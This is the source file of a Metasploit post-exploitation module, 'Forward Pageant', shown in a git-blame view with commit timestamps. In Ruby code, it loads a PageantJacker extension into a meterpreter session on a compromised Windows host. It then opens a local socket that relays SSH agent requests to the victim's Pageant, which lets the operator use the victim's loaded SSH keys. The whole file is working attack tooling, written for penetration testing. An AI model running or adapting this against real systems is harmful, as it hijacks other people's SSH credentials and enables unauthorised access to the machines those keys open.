metasploit-framework/modules/post/windows/manage/forward_pageant.rb

76 lines
2.2 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
2015-05-19 08:55:38 +00:00
require 'tmpdir'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
def initialize(info={})
super( update_info( info,
'Name' => 'Forward Pageant',
'Description' => %q{
This module forwards Pageant.
},
'License' => MSF_LICENSE,
'Author' => 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
2015-05-19 08:55:38 +00:00
#register_options(
# [
# ], self.class)
end
def run
## load incognito
if(!session.pageantjacker)
2015-05-19 09:33:32 +00:00
print_status("Loading PageantJacker extension on session #{session.sid} (#{session.session_host})")
2015-05-19 08:55:38 +00:00
session.core.use("pageantjacker")
end
if(!session.pageantjacker)
2015-05-19 09:33:32 +00:00
print_error("Failed to load PageantJacker on session #{session.sid} (#{session.session_host})")
2015-05-19 08:55:38 +00:00
return false
end
@sockpath = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('pageantjacker', 5)}"
if ::File.exists?(@sockpath)
print_error("Your requested socket (#{@sockpath}) already exists. Remove it or choose another path and try again.")
2015-05-19 08:55:38 +00:00
return false
end
::UNIXServer.open(@sockpath) {|serv|
print_status("Launched listening socket on #{@sockpath}.")
print_status("Set SSH_AUTH_SOCK variable to #{@sockpath} (e.g. export SSH_AUTH_SOCK=\"#{@sockpath}\")")
2015-05-19 08:55:38 +00:00
print_status("Now use any tool normally (e.g. ssh-add)")
loop {
s = serv.accept
loop {
socket_request_data = s.recvfrom(8192)
break if socket_request_data.nil? || socket_request_data.first.nil? || socket_request_data.first.empty?
response_data = client.pageantjacker.forward_to_pageant(socket_request_data.first, socket_request_data.first.size)
s.send response_data,0 if !response_data.nil?
}
}
}
end
def cleanup
if ::File.exists?(@sockpath)
::File.delete(@sockpath)
2015-05-19 08:55:38 +00:00
end
end
end